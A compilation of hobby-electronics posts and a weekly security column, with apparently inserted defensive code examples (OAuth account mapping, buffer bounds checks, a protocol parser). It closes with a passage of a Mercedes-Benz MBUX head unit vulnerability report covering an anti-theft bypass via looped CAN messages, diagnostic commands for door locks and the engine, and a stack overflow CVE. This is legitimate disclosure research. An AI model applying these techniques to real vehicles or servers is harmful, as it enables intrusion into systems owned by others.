Fabricobbled welding rigs seem to be [Professor Bardal]’s thing — witness this much more professional MIG welder, complete with a baking soda and vinegar shielding gas generator.
Thanks to [Danjovic] for the tip.
No Crystal Earpiece? No Problem!
A staple of starting off in electronics in years past was the crystal set radio, an extremely simple AM radio receiver with little more than a tuned circuit and a point contact diode as its components. Point contact diodes have become difficult to find, though they can be replaced with a cat's whisker type detector; but what about listening to the resulting audio? These circuits require a very high impedance headphone, which was often supplied by a piezoelectric crystal earpiece. [Tsbrownie] takes a moment to build a replacement for this increasingly hard to find part.
It shouldn’t have come as a surprise, but we were still slightly taken aback to discover that inside these earpieces lies the ubiquitous piezoelectric buzzer element. Thus given a 3D-printed shell to replace the one on the original, it’s a relatively simple task to twist up a set of wires and solder them on. The result is given a test, and found to perform just as well as the real thing, in fact a little louder.
In one sense this is such a simple job, but in another it opens up something non-obvious for anyone who needs a high impedance earpiece. The days of the crystal radios and rudimentary transistor hearing aids these parts were once the main target for may both have passed, but just in case there’s any need for one elsewhere, now we can fill it. Take a look at the video, below the break.
Fancy trying a crystal radio? We’ve got you covered.
Trinteract Mini Space Mouse Does It In 3D
We’re not sure how we managed to miss this one, but better late than never, right? This is Trinteract, a 3-DOF input device that’s both open-source and Arduino compatible. There’s even a neat 3D-printed clip to add it to the side of your laptop.
Imagine navigating 2D and 3D environments, or flying around in Minecraft with ease. [Görkem]’s custom PCB features a Hall effect sensor which picks up readings from the magnet embedded in the bottom of the joystick. You can use any magnetic object as input. In the video below the break, [Görkem] shows a 3D-printed sphere with a disc magnet trapped inside as an alternative. The super-neat part is that the thing moves around entirely on flexures. You know how much we love flexures around here.
[Görkem] has written up a fantastic guide for those who must have one of their own. As a bonus, the guide details the background and thought process behind the design, which we love to see.
Don’t like magnets? This space mouse uses an accelerometer and a spring.
Thanks for the tip, [James]!
Android Head Unit Gets Volume Knob Upgrade
Touch screen head units are pretty much the norm these days. Many compromise with annoying on-screen volume controls or tiny buttons. If you find yourself with such a unit, you might like to hack in a real volume knob. [Daniel Ross] shows us how to do just that.
The build uses an ATMega328 as the heart of the operation, though [Daniel] notes an Arduino Uno or Mini would have done just fine. It’s set up with a 74HC14 hex Schmitt trigger, and a CD4066 quad bilateral switch on a custom PCB. As for the volume knob itself, it’s not a real analog pot, instead it’s using a rotary encoder with a center push button. The way it works is that the Arduino reads the encoder, and figures out whether you’re trying to turn the volume up or down based on the direction you’re turning it. It then sends commands to the CD4066 to switch resistors in and out of circuit with lines going to the stereo to emulate the action of volume buttons on the steering wheel.
[Daniel’s] guide explains how everything works in greater detail, and how you can calibrate your head unit to accept these signals while preserving the function of your actual steering wheel volume buttons. Then you just have to find a neat way to integrate the knob into your existing dashboard.
We don’t see as many car stereo hacks in this era when infotainment systems rule all, but we’ve seen some great stuff from older vehicles over the years. Video after the break.
New Bambu Lab Firmware Update Adds Mandatory Authorization Control System
As per a recent Bambu Lab blog post, its FDM printers in the X1 series will soon receive a firmware update that adds mandatory authentication for certain operations, starting with the firmware update on January 23rd for the aforementioned FDM printers. These operations include performing firmware upgrades, initiating a print job (LAN or cloud), remote video access and adjusting parameters on the printer. Using the printer directly and starting prints from an SD card are not affected.
As reasoning for this new feature Bambu Lab points to recent exploits that gave strangers access to people’s printers, though cheekily linking to an article on an Anycubic printer exploit. While admittedly a concern, this mostly affects internet-exposed printers, such as those that are tied into a ‘cloud’ account. Even so, LAN-based printing also falls under this new mandatory authentication system, with Bambu Lab offering a new tool called Bambu Connect for those who insist on using non-Bambu Lab branded software like OrcaSlicer. This allows for exported G-code files to be sent to a (properly authenticated) Bambu Lab printer.
For those who do not wish to use this feature, not upgrading the firmware is currently the only recourse. Although this firmware update is only for X1-series printers, Bambu Lab promised that it’ll arrive for their other printers too in due time. While Bambu Lab printer owners consider installing the alternative X1 Plus firmware, the peanut gallery can discuss the potential security issues (or lack thereof) of an open Fluidd or similar UI on their LAN-connected, Klipper-based FDM printers.
Thanks to [mip] for the tip.
Hackaday Podcast Episode 304: Glitching the RP2350, Sim Sim Sim, and a Scrunchie Clock
It’s podcast time again, and this week Dan sat down with Elliot for a look back at all the cool hacks we’ve written about. We started off talking about Hackaday Europe, which is coming up in March — seems unlikely that it’s just around the corner, but there it is. There’s also good news: the Hack Chat is back, and we started things off with a bang as Eben Upton stopped by to talk all things Pi. Separately, we talked about fault injection attacks, including how to find the hidden cup of 0xC0FFEE in an RP2350.
We saw a very cool piece of LED jewelry that does a fluid simulation, a direct conversion radio that’s all laid out in front of you, and the scrunchiest mechanical digital clock you’ll ever see. We saw blinkenlights for blinkenlights’ sake, all the ways to put threads in your prints, and how to ditch the coax and wire up your antennas with Cat 6 cable. Plus, it’s an Al Williams twofer in the Can’t-Miss Articles, with a look back at life before GPS and how you can tune into digital ham radio, no radio required.
Episode 304 Show Notes:
News:
What’s that Sound?
- Congratulations to [Egon] for getting the Ross ice shelf, and not some sci-fi computer at all.
Interesting Hacks of the Week:
- All The Attacks On The RP2350
- A Direct Conversion Receiver Anyone Can Build
- Amateur Radio Homebrewing Hack Chat
- Make Your Own Variable Inductor
- DIY Tuning Capacitors From Washers And 3D-Printed Parts
- A Variable Capacitor For Not A Lot
- Fluid Simulation Pendant Teaches Lessons In Miniaturization
- Using The ESP8266 For Low-Cost Fault Injection
- Comparing Ways To Add Threads To Your 3D Prints
- Springs And Things Make For A Unique Timepiece
Quick Hacks:
- Elliot’s Picks
- Avian-Inspired Drones: How Studying Birds Of Prey Brings More Efficient Drones Closer
- Audio On A Shoestring: DIY Your Own Studio-Grade Mic
- Second CNC Machine Is Twice As Nice
- Dan’s Picks:
- Forget The Coax, Wire Up Your Antennas With Cat 6 Cable
- Procedurally Generated Terrain In OpenSCAD
- Blinkenlights-First Retrocomputer Design
Can’t-Miss Articles:
hackaday.com/2025/01/17/hackad…
You Can Build Your Own Hubless Roller Blades and Ride Off Road
Regular roller blades go way back, using a number of wheels mounted in a line and relying on regular bearings. [The Q] came up with an altogether more interesting design by handcrafting some tall skates with two hubless wheels apiece.
The build eliminates the hard work of creating the shoe part of the skates. Instead, an existing pair of roller blades was used, and modified to run the alternative hubless setup. The hubless wheels themselves were built by essentially wrapping a few large ball bearings with foam tires from an existing scooter wheel. The ball bearings have a large internal diameter, which creates the hubless look. They’re then mounted to a replacement steel frame that was mounted to the original skates.
Are there any benefits to hubless wheels in this application? Probably not, other than aesthetics. These skates are far heavier than before, and with poorer rolling resistance. However, we will note that the softer foam tires and large rolling diameter would probably offer some benefits on rougher surfaces. They even appear to work on hard-packed dirt, which is pretty impressive.
In any case, it’s always neat to see oddball designs that challenge our perception of what can and can’t be achieved on a mechanical level. These things don’t always have to make sense from an efficiency standpoint to be fun.
This Week in Security: Rsync, SSO, and Pentesting Mushrooms
Up first, go check your machines for the rsync version, and your servers for an exposed rsync instance. While there are some security fixes for clients in release 3.4.0, the buffer overflow in the server-side rsync daemon is the definite standout. The disclosure text includes this bit of nightmare fuel: “an attacker only requires anonymous read access to a rsync server, such as a public mirror, to execute arbitrary code on the machine the server is running on.”
A naive search on Shodan shows a whopping 664,955 results for rsync servers on the Internet. Red Hat’s analysis gives us a bit more information. The checksum length is specified by the remote client, and an invalid length isn’t properly rejected by the server. The effect is that an attacker can write up to 48 bytes into the heap beyond the normal checksum buffer space. The particularly dangerous case is also the default: anonymous access for file retrieval. Red Hat has not identified a mitigation beyond blocking access.
If you run servers or forward ports, it’s time to look at ports 873 and 8873 for anything listening. And since that’s not the only problem fixed, it’s really just time to update to rsync 3.4.0 everywhere you can. While there aren’t any reports of this being exploited in the wild, it seems like attempts are inevitable. As rsync is sometimes used in embedded systems and shipped as part of appliances, this particular bug threatens to have quite the long tail.
My Gmail is My Passport, Verify Me
Here’s an interesting question. What happens to those “Log In With Google” accounts that we all have all over the Internet, when the domain changes hands? And no, we’re not talking about gmail.com. We’re talking about myfailedbusiness.biz, or any custom domain that has been integrated with a Google Workspace. The business fails, the domain reverts back to unclaimed, someone else purchases it, and re-adds the admin@myfailedbusiness.biz Google Workspace account. Surely that doesn’t register as the same account for the purpose of Google SSO, right?
The answer to this question is to look at what actually happens when a user uses Google OAuth to log in. The service sends a message to Google, asking Google to identify the user. Google asks the user for confirmation, and if granted will send an ID token to the service. That token contains three fields that are interesting for this purpose. The domain and email are straightforward, and importantly don’t make any distinction between the original and new users. So when the domain and email change hands, so does ownership of the token.
OAuth does provide a sub (subject) field, which is a unique identifier for a given user/service combination. Seems like that solves the issue, right? The problem is that while that identifier is guaranteed to be unique, it’s not guaranteed to be consistent, and thus isn’t widely used as a persistent user identifier. Google is aware of the issue, and while they initially closed it as a “Won’t fix” issue, the concept did eventually earn [Dylan Ayrey] a nifty $1337 bounty and a promise that Google is working on unspecified fixes. There is no immediate solution, and it’s not entirely clear that this is strictly a Google problem. Other SSO solutions may have the same quirk.
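As an added illustration (not code from the column or from Google), here is a toy relying party in C that maps ID-token claims onto local accounts two different ways; the domain, addresses and sub values are constructed sample claims, and the struct layout is an assumption.

```c
/* Added example, not code from the column or from Google: a toy relying
 * party that maps ID-token claims onto local accounts two different ways.
 * All claim values below are constructed samples. */
#include <stdio.h>
#include <string.h>

/* The three claims the column discusses. */
struct id_token {
    const char *hd;    /* hosted (Workspace) domain */
    const char *email; /* mailbox inside that domain */
    const char *sub;   /* subject: unique per user and relying party */
};

#define MAX_ACCOUNTS 8
struct account { char email[64]; char sub[64]; int id; };
struct directory { struct account rows[MAX_ACCOUNTS]; int count; };

/* Create a local account for a token; returns its id, or -1 when full. */
static int create_account(struct directory *d, const struct id_token *t) {
    if (d->count >= MAX_ACCOUNTS) return -1;
    struct account *a = &d->rows[d->count];
    snprintf(a->email, sizeof a->email, "%s", t->email);
    snprintf(a->sub, sizeof a->sub, "%s", t->sub);
    a->id = ++d->count;
    return a->id;
}

/* Weak strategy: the e-mail address identifies the user. Whoever now
 * controls the domain can obtain a token with the same address and
 * inherits the account. */
static int login_by_email(struct directory *d, const struct id_token *t) {
    for (int i = 0; i < d->count; i++)
        if (strcmp(d->rows[i].email, t->email) == 0)
            return d->rows[i].id;
    return create_account(d, t);
}

/* Stronger strategy: key the account on sub. A different person behind
 * the same address presents a different subject and gets a separate
 * account instead of the old one. */
static int login_by_sub(struct directory *d, const struct id_token *t) {
    for (int i = 0; i < d->count; i++)
        if (strcmp(d->rows[i].sub, t->sub) == 0)
            return d->rows[i].id;
    return create_account(d, t);
}

/* Constructed claims: the original admin, then the domain's new owner who
 * re-created the same mailbox in a fresh Workspace tenant. */
static const struct id_token old_owner =
    { "myfailedbusiness.biz", "admin@myfailedbusiness.biz", "sub-old-111" };
static const struct id_token new_owner =
    { "myfailedbusiness.biz", "admin@myfailedbusiness.biz", "sub-new-222" };

/* Returns 1 if the new owner's login lands in the old owner's account. */
static int takeover(int (*login)(struct directory *, const struct id_token *)) {
    struct directory d = { 0 };
    int first = login(&d, &old_owner);
    int second = login(&d, &new_owner);
    return first == second;
}

int main(void) {
    printf("email-keyed login hands over old account: %d\n", takeover(login_by_email));
    printf("sub-keyed login hands over old account:   %d\n", takeover(login_by_sub));
    return 0;
}
```

The column's caveat still applies: sub is only guaranteed unique, not consistent, so a real service cannot treat it as an immutable key either.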
Fortigate Under Attack
Fortiguard has reported that a vulnerability in FortiOS and FortiProxy is under active exploitation. Fortiguard lists quite a few Indicators of Compromise (IoCs), but as far as the nature of the vulnerability, all we know is that it is an authentication bypass in a Node.js websocket module that allows a remote attacker to gain super-admin privileges. Yoiks.
Arctic Wolf has more details on the exploit campaign, which was first found back in early December, but appears to have begun with widespread scanning for the vulnerability as early as November 16. Attackers moved slowly, with the goal of establishing VPN access into the networks protected behind the vulnerable devices. Arctic Wolf has provided additional IoCs, so time to go hunting.
Ivanti Connect, Too
There’s another security device under attack this week, as watchTowr labs has yet another fun romp through vendor mis-security. This time it’s a two-part series on Ivanti Connect Secure, and the two buffer overflows being used in the wild.
Ivanti has already released a patch, so the researchers ran a diff on the strings output for the patched and unpatched binary of interest. Three new error messages are in the new version, complaining about client data exceeding a size limit. The Diaphora binary diffing tool found some interesting debugging data, like Too late for IFT_PREAUTH_INIT. “IF-T” turns out to be an open VPN standard, and that term led to a statement about backwards compatibility in Ivanti code that had terrible “code smell”.
The IF-T protocol includes the optional clientCapabilities field, and Ivanti’s implementation used a fixed length buffer to store it when parsing incoming connections. The client code almost gets it right, using a strlen() check on the data, and strncpy() to ensure the right number of bytes are copied. Except both of those best practices are completely useless when the result from strlen() is fed directly into strncpy() as the maximum byte count, without checking whether it overflows the buffer.
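As an added example (not rsync's or Ivanti's actual code), the two bounds mistakes described in this column, the rsync client-chosen checksum length and the Ivanti strlen()-into-strncpy() copy, each next to a checked version; the buffer sizes, wire layout and field names are assumptions made for the illustration.

```c
/* Added example, not code from rsync or Ivanti: the two bounds mistakes the
 * column describes, each beside a checked version. Buffer sizes, the wire
 * layout and the field names are illustrative assumptions. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define CAP_BUF    32   /* assumed fixed-size buffer for clientCapabilities */
#define DIGEST_MAX 16   /* assumed largest checksum the server supports */

/* Ivanti pattern: strlen() of the *source* becomes strncpy()'s limit, so the
 * limit never reflects the destination's size. Returns bytes written; the
 * caller must already know the data fits, which is exactly what was missing. */
static size_t copy_caps_unchecked(char *dst, const char *src) {
    size_t n = strlen(src);
    strncpy(dst, src, n);   /* n bounds the copy by src length, not by dst */
    dst[n] = '\0';
    return n;
}

/* Checked version: the limit comes from the destination, and an oversized
 * field is rejected before any byte is copied (the error the patch added). */
static int copy_caps_checked(char *dst, size_t dstsz, const char *src) {
    size_t n = strlen(src);
    if (n >= dstsz) {
        fprintf(stderr, "client data exceeds size limit (%zu >= %zu)\n", n, dstsz);
        return -1;
    }
    memcpy(dst, src, n + 1);   /* copies the terminator too */
    return (int)n;
}

/* rsync pattern: the checksum length arrives from the peer. Accepting it
 * as-is lets the peer pick a length past the digest buffer; checking it
 * against the server's own maximum before copying closes that path. */
struct sum_buf { uint8_t digest[DIGEST_MAX]; };

/* Assumed wire layout: one length byte followed by that many digest bytes. */
static int read_checksum(struct sum_buf *out, const uint8_t *wire, size_t wire_len) {
    if (wire_len < 1) return -1;
    size_t claimed = wire[0];                  /* client-chosen checksum length */
    if (claimed == 0 || claimed > DIGEST_MAX)  /* reject before touching memory */
        return -1;
    if (wire_len - 1 < claimed) return -1;     /* truncated message */
    memcpy(out->digest, wire + 1, claimed);
    return (int)claimed;
}

int main(void) {
    char caps[CAP_BUF];
    struct sum_buf s;
    /* constructed inputs: a short capability list and an oversized one */
    printf("short caps: %d\n", copy_caps_checked(caps, sizeof caps, "tls,ift-preauth"));
    printf("long caps:  %d\n", copy_caps_checked(caps, sizeof caps,
           "0123456789012345678901234567890123456789"));
    const uint8_t good[] = { 4, 1, 2, 3, 4 };
    const uint8_t bad[]  = { 64, 0 };          /* claims 64 bytes, far past DIGEST_MAX */
    printf("good checksum: %d\n", read_checksum(&s, good, sizeof good));
    printf("bad checksum:  %d\n", read_checksum(&s, bad, sizeof bad));
    return 0;
}
```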
The second watchTowr article goes through the steps of turning the vulnerability into a real exploit, but doesn’t actually give away any exploit code. Which hasn’t really mattered, as Proof of Concepts (PoCs) are now available. The takeaway is that Ivanti still has security problems with their code, and this particular exploit is both fully known, and being used in the wild.
Pentesting Mushrooms
The folks at Silent Signal have an off-the-beaten-path write-up for us: How to get hired as a pentester. Or alternatively, the story of hacking Mushroom Inc. See, they built an intentionally vulnerable web application, and invited potential hires to find flaws. This application included cross-site scripting potential, SQL injection, and bad password handling, among other problems. The test was to take 72 hours, and find and document problems.
Part of the test was to present the findings, categorize each vulnerability’s severity, and even make recommendations for how the fictional business could roll out fixes. Along the way, we get insights on how to get your job application dismissed, and what they’re really looking for in a hire. Useful stuff.
Bits and Bytes
Secure Boot continues to be a bit of a problem. Microsoft signed a UEFI application that in turn doesn’t actually do any of the Secure Boot validation checks. This is only an issue after an attacker has admin access to a machine, but it does completely defeat the point of Secure Boot. Microsoft is finally rolling out fixes, revoking the signature on the application.
And if compromising Windows 11 is of interest to you, HN Security has just wrapped a four-part series that covers finding a vulnerability in an old Windows kernel driver, and turning it into a real read/write exploit that bypasses all of Microsoft’s modern security hardening.
Do you have a website, and are you interested in how your API is getting probed? Want to mess with attackers a bit? You might be interested in the new baitroute tool. Put simply, it’s a honeypot for web APIs.
And finally, the minds behind Top10VPN have released another vulnerability, this time in tunneling protocols like IPIP, GRE, and 6in4. The problem is a lack of validation on incoming tunnel packets. This allows for easy traffic injection, and using the tunnel servers as easy proxies. One of the worst cases is where this flaw allows accessing an internal network protected behind a consumer router.
Modding a Toddler’s Ride-On For More Grunt
Kids love their Power Wheels and other ride-on electric cars. Indeed, [Ashwin]’s son was digging his little ATV, but soon found that some care was needed on the pedal. It had no proper throttle control, instead turning the motor hard on or off and scaring the poor kid in the process. The solution? A bit of an upgrade from some off-the-shelf electronics.
Inspiration came from—where else—the /r/PowerWheelsMods subreddit. The main tweak was to install an off-the-shelf soft-start circuit to stop the motor banging hard on when the accelerator was pushed. Instead, when the accelerator is pushed, the module gradually ramps up its PWM output to the motor to smooth out the acceleration curve. This would make the ATV much easier to ride.
Implementing this off-the-shelf solution did take some doing, though. The first attempt ended with a short circuit and a blown fuse. However, [Ashwin] wasn’t deterred—a trip back online to do some research did the trick. With some careful wiring that took into account the crude forward and reverse circuit, [Ashwin] had a much smoother running ride-on for his son.
While most of the mods we see for these little ride-ons are all about power and speed, we do appreciate the occasional attempt to make the things a bit safer for younger drivers. If you’re brewing up your own fancy kidmobile at home—don’t hesitate to let us know!
Mercedes-Benz Head Unit security research report
Introduction
This report covers the research of the Mercedes-Benz Head Unit, which was made by our team. Mercedes-Benz’s latest Head Unit (infotainment system) is called Mercedes-Benz User Experience (MBUX). We performed analysis of the first generation MBUX.
MBUX was previously analysed by KeenLab. Their report is a good starting point for diving deep into the MBUX internals and understanding the architecture of the system.
In our research we performed detailed analysis of the first generation MBUX subsystems, which are overlooked in the KeenLab research: diagnostics (CAN, UDS, etc.), connections via USB and custom IPC.
This article would not have been possible without the amazing work of Radu Motspan, Kirill Nesterov, Mikhail Evdokimov, Polina Smirnova and Georgy Kiguradze, who conducted the research, discovered the vulnerabilities, and laid the groundwork for this report.
Special thanks to Mercedes-Benz Group AG for their professionalism and prompt handling of all the identified vulnerabilities.
Diagnostic software
To get a first look at the vehicle architecture, it is helpful to use diagnostic software (which is available to certified users only) to scan the Electronic Control Unit (ECU), identify its version, and test the software’s diagnostic functionality. There are several diagnostic tools which make it possible to connect to the vehicle, using various types of communication. In our research, we used a combination of diagnostic tools: a certain hardware interface and a corresponding software application to communicate with the vehicle through the hardware device. This setup allowed us to establish communication over DoIP (Diagnostic Over Internet Protocol):
Communication between diagnostic software and hardware
The TCP communication between the diagnostic tool and the diagnostic hardware device is performed over Ethernet using custom protocols (Protocol Data Unit, PDU). At the first stage, the diagnostic hardware device uses a custom ASCII-based protocol (CSD). It performs user authentication, version check, configuration setup, and provides the initial environment to process the upper layer protocol (PDU).
The upper layer protocol has a binary format. It is used to send Universal Diagnostic Services (UDS) messages, trigger DoIP communication, and so on. To analyze this protocol, we used a script written in Lua:
[pduparser.lua]. Using this script, UDS commands can be easily distinguished from the regular network traffic of communication between the diagnostic software and hardware:
We examined the diagnostic tool interface and decoded the traffic, which allowed us to find various UDS commands, such as for resetting the ECU, turning off the engine, and locking the doors.
Architecture
The architecture of MBUX is as follows:
The main parts of MBUX are:
- MMB (Multi Media Board) — the main part of the head unit (HU) which contains all the subsystems;
- BB (Base Board) — the part with chips for various network communications;
- CSB (Country Specific Board) — the extended part which communicates with the MMB through internal Ethernet;
- RH850 — the module designed to provide communication between low level buses.
Full information on the MBUX architecture can be found in the KeenLab research.
Test setups
For our research we used two test setups:
- a real car — Mercedes B180;
- a testbed — our own platform for hardware and software testing, which we designed for the purpose of this study.
Anti-Theft
While modeling the testbed, we needed to bypass the original anti-theft feature, because after the actual vehicle is started up, the head unit waits for authentication over the CAN bus. As mentioned in the KeenLab research, specific commands should be sent over CAN to wake up the system. We couldn’t imitate this in our setup, so the head unit was entering anti-theft mode and the user couldn’t communicate with it. Taking an empirical approach, we discovered that some CAN messages force the head unit to reset the anti-theft status. In fact, these messages trigger the anti-theft check. For example, when the head unit tries to turn off the display, the CAN message initiates the anti-theft check, leaving the head unit still accessible for a few seconds. For seamless and stable investigation, we created a script that continuously sent this message in a loop.
As a result, the head unit becomes accessible for a long time, switching between an authenticated state and anti-theft mode.
Firmware
The MMB runs on Linux, and its filesystems are located on the eMMC. We needed to extract the eMMC from the printed circuit board by unsoldering it. Inside, there are several partitions:
MMB files can also be downloaded from a diagnostic tool website that provides updates for specific hardware part numbers.
Unpack update
Nowadays multimedia systems in cars are generally updated over-the-air. Car dealerships are one exception, however, as they can perform offline software updates with the diagnostic tool.
Several outdated update files can still be found online. Update file types can be divided into the following groups by their names:
- files with *ALL*, containing *.CFF, *.SMR-F and *.bin files;
- files with *CFF*, containing only *.CFF files;
- files with *SMR-F*, containing only *.SMR-F files.
In general, *.bin files are containers with a custom file structure. They can be encoded with zlib or other methods.
*.SMR-F files are compressed and they also have a custom file structure. Besides metadata in plaintext, they also contain encrypted data, which the diagnostic tool uses its shared libraries to decrypt. After decryption, the resulting file contains the metadata and a container, just like the *.bin files.
*.CFF files contain the same payload content as the *.SMR-F files, but uncompressed. This format was used for earlier head unit generations.
Custom IPC
Inside the head unit, firmware services use custom IPC protocols for communication between their own threads, other services and other ECUs. There are three main widely used protocols:
- thriftme;
- MoCCA;
- GCF.
These protocols can be used at the same time; moreover, each service can use all of them simultaneously. Knowing the internals and API of these protocols, it’s easier to understand the workflow of the services.
thriftme
This RPC protocol is based on the open-source protocol Apache Thrift. Its main distinctive feature is that thriftme allows subscribers to be notified about particular events. The UNIX socket, TCP, UDP, SSL, and so on can be used as a transport for this protocol. The core functionality of this protocol is implemented in the library libthriftme.so.2.7.2.
The base class in the thriftme RPC is “thrift::TServiceBroker”, which isolates the communication with transports and call interfaces of services and clients. In thriftme, the service broker version is the instance of “thrift::lisa::CTLisaServiceBroker”, which inherits from “thrift::TServiceBroker”.
Services in thriftme are inherited from “thrift::lisa::TLisaServerBase” (which, in turn, inherits from “thrift::TServiceProcessor”). Services are registered in the service broker through “thrift::TServiceProcessor::registerService”. Transport used by clients is registered through “thrift::lisa::CTLisaServiceBroker::addServers” (which wraps “thrift::TServiceBroker::addServer”). Service interface functions are registered through “thrift::TServiceProcessor::tmRegisterCallback”. The handler is passed to this export function in arguments, and it is called while processing the client request. So the instance of the service in memory looks as follows:
The “interface1” field contains functions which process the API of the service and their wrappers previously registered through “thrift::TServiceProcessor::tmRegisterCallback”. The “interface2” field contains functions which are called to notify subscribers of this service.
Clients in thriftme are inherited from “thrift::lisa::TLisaClientBase” (which, in turn, inherits from “thrift::TClient”). In fact, client instances are created by the service broker when the transport is successfully created. In our case, the service broker used the factory of a client, which is registered in the service broker through “thrift::TServiceBroker::tmRegCli”. The factory helps clients register handlers for notification about events through “thrift::TClient::tmRegisterCallback”. The sample instance layout of a thriftme client is the following:
The “interface1” field contains the handler that is called after the transport connection is established. Usually this handler is used to trigger a subscribe operation to receive event notifications. The “interface2” field contains functions which send requests to the service API. The “interface3” field contains functions which are called before initiating the “notify subscribers” operation of this service. Their wrappers were previously registered through “thrift::TClient::tmRegisterCallback”.
MoCCA
This RPC framework was developed by Harman and is based on the open-source DSI framework. The core functionality is implemented in the “/opt/sys/lib/libSysMoCCAFrameworkSharedSo.so.11” library. This framework is widely used for interthread communication.
During start-up, the service creates component instances through factory functions, for example “CHBApplicationBuilder::theCDiagnosisComponentCreator”. Such an instance inherits from the class “CHBComponent”. The global variable “CHBComponentInfo::spMap” contains the mapping between component names and additional information about the components. The framework allows components to define aliases for accessing other components through “CHBComponentInfo::addComponentMapping”, for example: “CHBComponentInfo::addComponentMapping(&unk_581498, "FsActionHandler", "FilesystemMainActionHandler")”. Components can contain multiple services and clients and can communicate with their own services or with the services of other components. The architecture of components is as follows:
For communication the following events are used:
An example of a client object is “CTraceServiceClientBase”, which inherits from “CHBClientBase” and uses the proxy object “CTraceServiceProxy” for transport. The proxy object inherits from “CHBProxyBase” and is created through the factory method “CTraceServiceProxy::findOrCreateInstance”. It tries to reuse already created proxy objects inside this component. The general layout of a client object is as follows:
The “IHBEventConsumer” interface is used to process response events in “CTraceServiceClientBase”. The entry point for processing is the “processEvent” method. It uses two values to find the handler to call:
- use the “status” field to identify the response: standard response of a service, failed or invalid response;
- use the “internalID” field to identify the API function.
On the service side in our example we used the “CTraceServiceStub” class. Below is its layout:
The request event is processed in the “processEvent” method. It identifies the API function handler using the “internalID” field and calls the identified handler.
GCF
GCF is a custom protocol used for RPC. It allows services to be registered in a router. The router handles the following messages from services and clients:
- Control message (“CTRL”):
  - “REGS” – used to register a service;
  - “REGF” – used to register an RPC function of a service;
  - “EVNT” – used by a service to notify clients about an event;
  - “CALL” – used by clients to call functionality of a service;
  - etc.
So during initialization, services are registered in the router, and the router’s internal table drives message processing. Finally, clients can send call requests to the router, which trigger predefined functions of registered services. The format of a call request is as follows:
CALL <ServiceName>:<Number> <ServiceCallName> <Params>
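As an added illustration (not code from the head unit or from this research), the following Python parser enforces the CALL request grammar shown above and forwards a call only to a handler that has been registered, which is the check a router should make before dispatching. The identifier character set, the maximum frame length, the whitespace-separated parameter rule and the “ExampleService” registry are assumptions made for the example.

```python
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, List

# Strict grammar for one GCF call request:
#   CALL <ServiceName>:<Number> <ServiceCallName> <Params>
# Identifier alphabet, number width and printable-ASCII params are assumptions
# for this example; the real router's grammar is not documented on the page.
_IDENT = r"[A-Za-z_][A-Za-z0-9_]*"
_CALL_RE = re.compile(
    rf"^CALL (?P<service>{_IDENT}):(?P<number>\d{{1,10}}) "
    rf"(?P<func>{_IDENT})(?: (?P<params>[\x20-\x7e]*))?$"
)
MAX_MESSAGE_LEN = 1024  # constructed limit: refuse oversized frames before parsing


@dataclass
class GcfCall:
    service: str
    number: int
    func: str
    params: List[str] = field(default_factory=list)


class GcfParseError(ValueError):
    """Raised for any frame that is not a well-formed CALL request."""


def parse_call(message: str) -> GcfCall:
    """Parse one CALL request; raise GcfParseError on anything malformed."""
    if len(message) > MAX_MESSAGE_LEN:
        raise GcfParseError("message too long")
    m = _CALL_RE.match(message.rstrip("\r\n"))
    if m is None:
        raise GcfParseError(f"not a well-formed CALL request: {message[:40]!r}")
    raw_params = m.group("params") or ""
    return GcfCall(
        service=m.group("service"),
        number=int(m.group("number")),
        func=m.group("func"),
        params=raw_params.split(),
    )


def is_valid_call(message: str) -> bool:
    """Convenience predicate around parse_call()."""
    try:
        parse_call(message)
        return True
    except GcfParseError:
        return False


Handler = Callable[[List[str]], str]


def dispatch(message: str, registry: Dict[str, Handler]) -> str:
    """Route a CALL to a registered 'Service.func' handler, refusing unknown ones.
    Only functions a service announced (REGF on the page) should be callable."""
    call = parse_call(message)
    key = f"{call.service}.{call.func}"
    handler = registry.get(key)
    if handler is None:
        raise GcfParseError(f"no registered handler for {key}")
    return handler(call.params)


# Constructed sample registry and messages (not taken from the head unit).
SAMPLE_REGISTRY: Dict[str, Handler] = {
    "ExampleService.echo": lambda params: " ".join(params),
}
SAMPLE_OK = "CALL ExampleService:7 echo hello world"
SAMPLE_BAD = "CALL ExampleService:7 echo\x00 hello"  # embedded NUL: rejected

if __name__ == "__main__":
    print(parse_call(SAMPLE_OK))
    print(dispatch(SAMPLE_OK, SAMPLE_REGISTRY))
```

The parser deliberately fails closed: anything that is not exactly the documented shape, and any call to a function that no service registered, is an error rather than a best-effort forward.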
Internal network
As mentioned in the KeenLab research, there are some test points on the head unit which are used by the CSB to connect to the MMB. We removed the default connection and connected an RJ45 cable to access the internal network of the head unit. This connection, labelled eth0, has some restrictions, as stated in the corresponding firewall rules in “firewall_prd.policy”:
-A INPUT -s [IP]/32 -d [IP]/32 -i eth0 -m state --state NEW -j ACCEPT
-A OUTPUT -s [IP]/32 -d [IP]/32 -o eth0 -j ACCEPT
-A OUTPUT -s [IP]/32 -d [IP]/32 -o eth0 -m state --state NEW -j ACCEPT
Access to services on the MMB is established via an IP address that is the default address for connecting the CSB to the MMB. The results of a TCP port scan of the MMB are as follows:
After connecting to the test point, we gained access to a huge attack surface, including the Diagnostic Log and Trace (DLT) subsystem, which is very helpful for testing and debugging:
DLT supports callback injection, which makes it possible to call specific handlers inside services. In the head unit this feature is widely used for product testing.
Identified vulnerabilities
The following findings were used to compromise the testbed. Compromising the testbed is necessary for debugging the environment and for searching for vulnerabilities in subsystems that can be exploited in a real car.
CVE-2024-37600 (MoCCA)
The “servicebroker” service is part of the DSI framework used by MoCCA. This service is used to monitor services and clients.
It sets up HTTP servers on TCP ports. Several POST commands can be processed; one of them is disconnect, which takes a string as an argument.
The code in the setup() function parses this command with functions that provide unnecessarily broad access to memory. According to the disassembled code, it performs read operations using sscanf on a stack buffer. As a result, a stack buffer overflow can occur:
In DLT logs we can identify crashes:
CVE-2023-34404 (GCF)
“MonitorService” is a service which can be accessed over the GCF protocol. It is initialized and started in the “scp” service, which in turn is a systemd service started with the following configuration:
...
[Service]
ExecStart=/opt/comm/swmp/wicome/bin/scp -f /var/opt/swmp/pss_config.cfg -s wicome_config -r /opt/comm/swmp/wicome/bin -k VerboseLevel=5
ExecStop=/bin/kill $MAINPID
Environment=LD_LIBRARY_PATH=/opt/sys/lib:/opt/comm/swmp/wicome/lib
Environment=LOGNAME=root
EnvironmentFile=/opt/etc/lisa_env
Type=simple
Restart=on-failure
RestartSec=2
WatchdogSec=240
...
“MonitorService” uses the configuration file “/var/opt/swmp/pss_config.cfg” to fine-tune its operation:
